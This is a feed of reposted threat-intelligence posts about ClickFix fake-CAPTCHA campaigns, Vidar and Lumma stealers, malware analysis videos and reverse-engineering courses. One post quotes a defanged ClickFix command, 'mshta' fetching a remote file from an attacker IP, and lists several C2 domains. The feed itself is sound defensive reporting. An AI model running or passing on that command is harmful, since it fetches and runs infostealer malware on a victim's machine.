Reposted by ExecuteMalware
My first blog with Proofpoint is live! And we love a good crossover. State-sponsored actors try their hand at ClickFix - the hottest thing in cybercrime. Meet the North Koreans, Iranians, and Russians who are upping their social engineering game www.proofpoint.com/us/blog/thre...
Around the World in 90 Days: State-Sponsored Actors Try ClickFix | Proofpoint US
Key Findings While primarily a technique affiliated with cybercriminal actors, Proofpoint researchers discovered state-sponsored actors in multiple campaigns using the ClickFix social
www.proofpoint.com
April 17, 2025 at 11:12 AM
My first blog with Proofpoint is live! And we love a good crossover. State-sponsored actors try their hand at ClickFix - the hottest thing in cybercrime. Meet the North Koreans, Iranians, and Russians who are upping their social engineering game www.proofpoint.com/us/blog/thre...
Reposted by ExecuteMalware
I took a look at a new malware loader which uses steganography within WAV 🌊 files to deliver its payload on an endpoint. Enjoy!
www.youtube.com/watch?v=NiNI...
www.youtube.com/watch?v=NiNI...
I found MALWARE inside of MUSIC! (Octowave Steganography Malware Analysis)
YouTube video by Jai Minton - CyberRaiju
www.youtube.com
March 4, 2025 at 10:26 AM
I took a look at a new malware loader which uses steganography within WAV 🌊 files to deliver its payload on an endpoint. Enjoy!
www.youtube.com/watch?v=NiNI...
www.youtube.com/watch?v=NiNI...
Reposted by ExecuteMalware
⌛ This series will take you through installing WinDbg and configuring Binary Ninja to use the WinDbg engine to create and use TTD traces. It will also show you how to capture TTD traces and replay them in Binary Ninja 👇
Getting Started with Time-Travel Debugging in Binary Ninja
This series will take you through installing WinDbg and configuring Binary Ninja to use the WinDbg engine to create and use TTD traces. It will also show you...
buff.ly
February 6, 2025 at 6:42 PM
⌛ This series will take you through installing WinDbg and configuring Binary Ninja to use the WinDbg engine to create and use TTD traces. It will also show you how to capture TTD traces and replay them in Binary Ninja 👇
Reposted by ExecuteMalware
Note: The C2 for this infection has been identified as Lumma Stealer instead of Vidar:
- threatfox.abuse.ch/ioc/1405142/
- threatfox.abuse.ch/ioc/1405142/
February 6, 2025 at 3:45 PM
Note: The C2 for this infection has been identified as Lumma Stealer instead of Vidar:
- threatfox.abuse.ch/ioc/1405142/
- threatfox.abuse.ch/ioc/1405142/
Reposted by ExecuteMalware
2025-02-05 (Wednesday): #ClearFake / #ClickFix style fake CAPTCHA leads to possible #Vidar.
Vidar C2 using eteherealpath[.]top behind Cloudflare.
Details at github.com/malware-traf...
Vidar C2 using eteherealpath[.]top behind Cloudflare.
Details at github.com/malware-traf...
February 6, 2025 at 1:03 AM
2025-02-05 (Wednesday): #ClearFake / #ClickFix style fake CAPTCHA leads to possible #Vidar.
Vidar C2 using eteherealpath[.]top behind Cloudflare.
Details at github.com/malware-traf...
Vidar C2 using eteherealpath[.]top behind Cloudflare.
Details at github.com/malware-traf...
Reposted by ExecuteMalware
With Trump's win, crypto's price is booming. But beware. @g0njxa.bsky.social and @russianpanda.bsky.social have done a massive investigation into how an organised criminal group is trying to steal #bitcoin and other #crytocurrency with infostealer malware. #infosec trac-labs.com/hearts-stole...
Hearts Stolen, Wallets Emptied: Insights into CryptoLove Traffer’s Team
Insights into CryptoLove traffer’s team operation. Let’s dive in…
trac-labs.com
December 1, 2024 at 9:34 AM
With Trump's win, crypto's price is booming. But beware. @g0njxa.bsky.social and @russianpanda.bsky.social have done a massive investigation into how an organised criminal group is trying to steal #bitcoin and other #crytocurrency with infostealer malware. #infosec trac-labs.com/hearts-stole...
Reposted by ExecuteMalware
2025-02-04 (Tuesday): From a #ClickFix style fake CAPTCHA, I got a copy/paste command for:
mshta hxxp[:]//80.64.30[.]238/evix.xll
Ran it and ended up with HTTPS C2 traffic to stchkr[.]rest which was reported as a #Vidar domain yesterday on ThreatFox.
threatfox.abuse.ch/ioc/1402588/
mshta hxxp[:]//80.64.30[.]238/evix.xll
Ran it and ended up with HTTPS C2 traffic to stchkr[.]rest which was reported as a #Vidar domain yesterday on ThreatFox.
threatfox.abuse.ch/ioc/1402588/
February 4, 2025 at 11:34 PM
2025-02-04 (Tuesday): From a #ClickFix style fake CAPTCHA, I got a copy/paste command for:
mshta hxxp[:]//80.64.30[.]238/evix.xll
Ran it and ended up with HTTPS C2 traffic to stchkr[.]rest which was reported as a #Vidar domain yesterday on ThreatFox.
threatfox.abuse.ch/ioc/1402588/
mshta hxxp[:]//80.64.30[.]238/evix.xll
Ran it and ended up with HTTPS C2 traffic to stchkr[.]rest which was reported as a #Vidar domain yesterday on ThreatFox.
threatfox.abuse.ch/ioc/1402588/
Reposted by ExecuteMalware
2025-01-30 (Thursday): #XLoader infection. Unlike my previous XLoader infections, this one didn't run in my VM, so I used a physical host. A #pcap of the infection traffic, the associated malware samples, and more info is available at malware-traffic-analysis.net/2025/01/30/i...
January 30, 2025 at 6:32 PM
2025-01-30 (Thursday): #XLoader infection. Unlike my previous XLoader infections, this one didn't run in my VM, so I used a physical host. A #pcap of the infection traffic, the associated malware samples, and more info is available at malware-traffic-analysis.net/2025/01/30/i...
Reposted by ExecuteMalware
📣 New video drop - in this video I discuss ways to detect shellcode entry point using properties of position independence. Nothing advanced but a helpful technique when you lack context on the shellcode 👇
Analyzing Shellcode - Finding the Entry Point Based Off Position Independence
Sometimes you'll discover shellcode, but not have the time or ability to determine its entry point. In this video, we'll explore a technique using common she...
buff.ly
January 30, 2025 at 7:00 PM
📣 New video drop - in this video I discuss ways to detect shellcode entry point using properties of position independence. Nothing advanced but a helpful technique when you lack context on the shellcode 👇
Reposted by ExecuteMalware
No live streams this week so why not learn more about the PE file format?! This video discusses the AddressOfEntryPoint and techniques for finding main in tools such as IDA Pro 👇
https://buff.ly/4haGIDu
Need more PE (and who doesn't)? Give this playlist a view:
https://buff.ly/4aO0lz3
https://buff.ly/4haGIDu
Need more PE (and who doesn't)? Give this playlist a view:
https://buff.ly/4aO0lz3
The AddressOfEntryPoint and Tips for Finding Main
The PE file format defines the entry point for execution through the AddressOfEntryPoint field. However, it's not as straight-forward as it may seem. In this...
buff.ly
January 27, 2025 at 4:00 PM
No live streams this week so why not learn more about the PE file format?! This video discusses the AddressOfEntryPoint and techniques for finding main in tools such as IDA Pro 👇
https://buff.ly/4haGIDu
Need more PE (and who doesn't)? Give this playlist a view:
https://buff.ly/4aO0lz3
https://buff.ly/4haGIDu
Need more PE (and who doesn't)? Give this playlist a view:
https://buff.ly/4aO0lz3
Reposted by ExecuteMalware
In case if you wonder what broke #ProcessHollowing on Windows 11 24H2, I have something for you: hshrzd.wordpress.com/2025/01/27/p...
Process Hollowing on Windows 11 24H2
Process Hollowing (a.k.a. RunPE) is probably the oldest, and the most popular process impersonation technique (it allows to run a malicious executable under the cover of a benign process). It is us…
hshrzd.wordpress.com
January 26, 2025 at 11:55 PM
In case if you wonder what broke #ProcessHollowing on Windows 11 24H2, I have something for you: hshrzd.wordpress.com/2025/01/27/p...
Reposted by ExecuteMalware
🦔 📹 New Video: Binary Refinery deobfuscation of a LummaStealer loader (PowerShell, JScript)
www.youtube.com/watch?v=kHU_...
#MalwareAnalysisForHedgehogs #PowerShell #JScript
www.youtube.com/watch?v=kHU_...
#MalwareAnalysisForHedgehogs #PowerShell #JScript
Malware Analysis - Binary Refinery URL extraction of Multi-Layered PoshLoader for LummaStealer
YouTube video by MalwareAnalysisForHedgehogs
www.youtube.com
January 27, 2025 at 4:23 AM
🦔 📹 New Video: Binary Refinery deobfuscation of a LummaStealer loader (PowerShell, JScript)
www.youtube.com/watch?v=kHU_...
#MalwareAnalysisForHedgehogs #PowerShell #JScript
www.youtube.com/watch?v=kHU_...
#MalwareAnalysisForHedgehogs #PowerShell #JScript
Reposted by ExecuteMalware
A fairly sizable distributed port scan (all source port 19000) about 30 minutes ago; raw logs and sources here:
gist.github.com/silence-is-b...
gist.github.com/silence-is-b...
January 24, 2025 at 5:16 PM
A fairly sizable distributed port scan (all source port 19000) about 30 minutes ago; raw logs and sources here:
gist.github.com/silence-is-b...
gist.github.com/silence-is-b...
Reposted by ExecuteMalware
2025-01-22 (Wednesday): #TrafficAnalysisExercise: Download from fake software site.
I've posted a traffic analysis exercise based on the same type of #Malvertizing I wrote about for my employer at github.com/PaloAltoNetw...
The exercise #pcap is at www.malware-traffic-analysis.net/2025/01/22/i...
I've posted a traffic analysis exercise based on the same type of #Malvertizing I wrote about for my employer at github.com/PaloAltoNetw...
The exercise #pcap is at www.malware-traffic-analysis.net/2025/01/22/i...
January 23, 2025 at 6:36 PM
2025-01-22 (Wednesday): #TrafficAnalysisExercise: Download from fake software site.
I've posted a traffic analysis exercise based on the same type of #Malvertizing I wrote about for my employer at github.com/PaloAltoNetw...
The exercise #pcap is at www.malware-traffic-analysis.net/2025/01/22/i...
I've posted a traffic analysis exercise based on the same type of #Malvertizing I wrote about for my employer at github.com/PaloAltoNetw...
The exercise #pcap is at www.malware-traffic-analysis.net/2025/01/22/i...
Reposted by ExecuteMalware
New episode of DISCARDED! Featuring Kristina Walter, Chief of the NSA's Cybersecurity Collaboration Center. It was a fantastic conversation.
Apple: podcasts.apple.com/us/podcast/d...
Spotify: open.spotify.com/episode/0Ont...
Web: www.proofpoint.com/us/podcasts/...
Apple: podcasts.apple.com/us/podcast/d...
Spotify: open.spotify.com/episode/0Ont...
Web: www.proofpoint.com/us/podcasts/...
The Power of Partnerships: An Interview with the NSA’s Kristina Walter
Podcast Episode · DISCARDED: Tales From the Threat Research Trenches · 01/22/2025 · 40m
podcasts.apple.com
January 23, 2025 at 5:47 PM
New episode of DISCARDED! Featuring Kristina Walter, Chief of the NSA's Cybersecurity Collaboration Center. It was a fantastic conversation.
Apple: podcasts.apple.com/us/podcast/d...
Spotify: open.spotify.com/episode/0Ont...
Web: www.proofpoint.com/us/podcasts/...
Apple: podcasts.apple.com/us/podcast/d...
Spotify: open.spotify.com/episode/0Ont...
Web: www.proofpoint.com/us/podcasts/...
Reposted by ExecuteMalware
📣 New Year, New Episode - check out the latest episode of the Behind the Binary podcast! Stephen Eckels joins us to talk about game hacking/modding, discovering the Sunburst backdoor, getting into reverse engineering and much more!
🎧
🎧
EP04 Stephen Eckels - A Journey From Game Modding to SolarWinds: How One Gamer Became a Renowned Reverse Engineer
Behind the Binary by Google Cloud Security · Episode
buff.ly
January 15, 2025 at 6:04 PM
📣 New Year, New Episode - check out the latest episode of the Behind the Binary podcast! Stephen Eckels joins us to talk about game hacking/modding, discovering the Sunburst backdoor, getting into reverse engineering and much more!
🎧
🎧
Reposted by ExecuteMalware
Takedown Services Manager Hannah Rapetti helps Proofpoint customers address malicious web domains that are targeting their company.
In this video, she highlights tactics employed by threat actors to trick users into thinking the content is legitimate.
Stream the full episode: ow.ly/vXoP50UGz5e.
In this video, she highlights tactics employed by threat actors to trick users into thinking the content is legitimate.
Stream the full episode: ow.ly/vXoP50UGz5e.
January 15, 2025 at 4:40 PM
Takedown Services Manager Hannah Rapetti helps Proofpoint customers address malicious web domains that are targeting their company.
In this video, she highlights tactics employed by threat actors to trick users into thinking the content is legitimate.
Stream the full episode: ow.ly/vXoP50UGz5e.
In this video, she highlights tactics employed by threat actors to trick users into thinking the content is legitimate.
Stream the full episode: ow.ly/vXoP50UGz5e.
Reposted by ExecuteMalware
🚀 Learning tools such as IDA Pro and Ghidra starts with understanding assembly. One of my latest courses on Pluralsight will teach you the basics of the assembly language to get started 👇
https://buff.ly/3Pz2wfZ
Or you can check out this 24 video playlist on YouTube:
https://buff.ly/4jfR72c
https://buff.ly/3Pz2wfZ
Or you can check out this 24 video playlist on YouTube:
https://buff.ly/4jfR72c
Malware Analysis: Assembly Basics
Learning tools such as IDA Pro and Ghidra starts with understanding assembly. This course will teach you the basics of the assembly language to get started as a reverse engineer!
buff.ly
January 15, 2025 at 4:00 PM
🚀 Learning tools such as IDA Pro and Ghidra starts with understanding assembly. One of my latest courses on Pluralsight will teach you the basics of the assembly language to get started 👇
https://buff.ly/3Pz2wfZ
Or you can check out this 24 video playlist on YouTube:
https://buff.ly/4jfR72c
https://buff.ly/3Pz2wfZ
Or you can check out this 24 video playlist on YouTube:
https://buff.ly/4jfR72c
Reposted by ExecuteMalware
Imagine for a moment that Google allowed a sponsored link to a phishing site for Google ads...
www.malwarebytes.com/blog/news/20...
#GoogleSearch #GoogleAds #malvertising #phishing
www.malwarebytes.com/blog/news/20...
#GoogleSearch #GoogleAds #malvertising #phishing
The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads
An ongoing malvertising campaign steals Google advertiser accounts via fraudulent ads for Google Ads itself.
www.malwarebytes.com
January 15, 2025 at 1:55 PM
Imagine for a moment that Google allowed a sponsored link to a phishing site for Google ads...
www.malwarebytes.com/blog/news/20...
#GoogleSearch #GoogleAds #malvertising #phishing
www.malwarebytes.com/blog/news/20...
#GoogleSearch #GoogleAds #malvertising #phishing
Reposted by ExecuteMalware
2025-01-13 (Mon): Something I wrote for my employer: Legitimate websites infected with #KongTuke script present CAPTCHA-style pages that ask victims to paste #PowerShell script into a Run window. Lately, this has led to infections abusing the #BOINC platform. More info at: github.com/PaloAltoNetw...
January 14, 2025 at 6:49 PM
2025-01-13 (Mon): Something I wrote for my employer: Legitimate websites infected with #KongTuke script present CAPTCHA-style pages that ask victims to paste #PowerShell script into a Run window. Lately, this has led to infections abusing the #BOINC platform. More info at: github.com/PaloAltoNetw...
Reposted by ExecuteMalware
🎙️ New podcast is live!
This time, we’re diving into detection engineering: the process, challenges, and how to break into the field. Packed with practical tips and insights!
🎧 Check it out: creators.spotify.com...
This time, we’re diving into detection engineering: the process, challenges, and how to break into the field. Packed with practical tips and insights!
🎧 Check it out: creators.spotify.com...
Detection Engineering: Process, Challenges, and Careers by InfoSec Deep Dive
In this episode, Alice and Bob dive into the world of detection engineering, breaking down what it means and why it’s crucial in cybersecurity. Exploring the detection engineering process, the challenges of creating effective detections, and how automation and behavioral analytics are reshaping the field. Plus, we’ll discuss how detection engineering intersects with threat hunting and offer practical advice for anyone looking to get started in this area of InfoSec.
Sources Referenced:
Detection Engineering vs. Threat Hunting | Medium
Detection Engineering Overview | Splunk
Detection Engineering Case Study | GitGuardian
How to Become a Detection Engineer | Let's Defend
About Detection Engineering | Medium
creators.spotify.com
January 13, 2025 at 4:28 PM
🎙️ New podcast is live!
This time, we’re diving into detection engineering: the process, challenges, and how to break into the field. Packed with practical tips and insights!
🎧 Check it out: creators.spotify.com...
This time, we’re diving into detection engineering: the process, challenges, and how to break into the field. Packed with practical tips and insights!
🎧 Check it out: creators.spotify.com...
Reposted by ExecuteMalware
🎉 Only a few weeks left until our new features and authentication launch! Here’s a reminder of what to expect: ✨
NEW capabilities, including:
✅ False-positive lists to refine your searches
✅ URLhaus hunting tools for deeper insights
✅ And so much more!
1/2
NEW capabilities, including:
✅ False-positive lists to refine your searches
✅ URLhaus hunting tools for deeper insights
✅ And so much more!
1/2
January 9, 2025 at 2:13 PM
🎉 Only a few weeks left until our new features and authentication launch! Here’s a reminder of what to expect: ✨
NEW capabilities, including:
✅ False-positive lists to refine your searches
✅ URLhaus hunting tools for deeper insights
✅ And so much more!
1/2
NEW capabilities, including:
✅ False-positive lists to refine your searches
✅ URLhaus hunting tools for deeper insights
✅ And so much more!
1/2
Reposted by ExecuteMalware
☠️ If learning malware analysis/reverse engineering skills is on your 2025 to do list, you're in luck! I've created a live stream series called Malware Mondays to help you get started 👇
https://buff.ly/4j5KZtq
Sessions are independent but can be viewed consecutively to enhance abilities!
https://buff.ly/4j5KZtq
Sessions are independent but can be viewed consecutively to enhance abilities!
Malware Mondays
Share your videos with friends, family, and the world
buff.ly
January 9, 2025 at 2:40 PM
☠️ If learning malware analysis/reverse engineering skills is on your 2025 to do list, you're in luck! I've created a live stream series called Malware Mondays to help you get started 👇
https://buff.ly/4j5KZtq
Sessions are independent but can be viewed consecutively to enhance abilities!
https://buff.ly/4j5KZtq
Sessions are independent but can be viewed consecutively to enhance abilities!
Reposted by ExecuteMalware
January 9, 2025 at 2:52 PM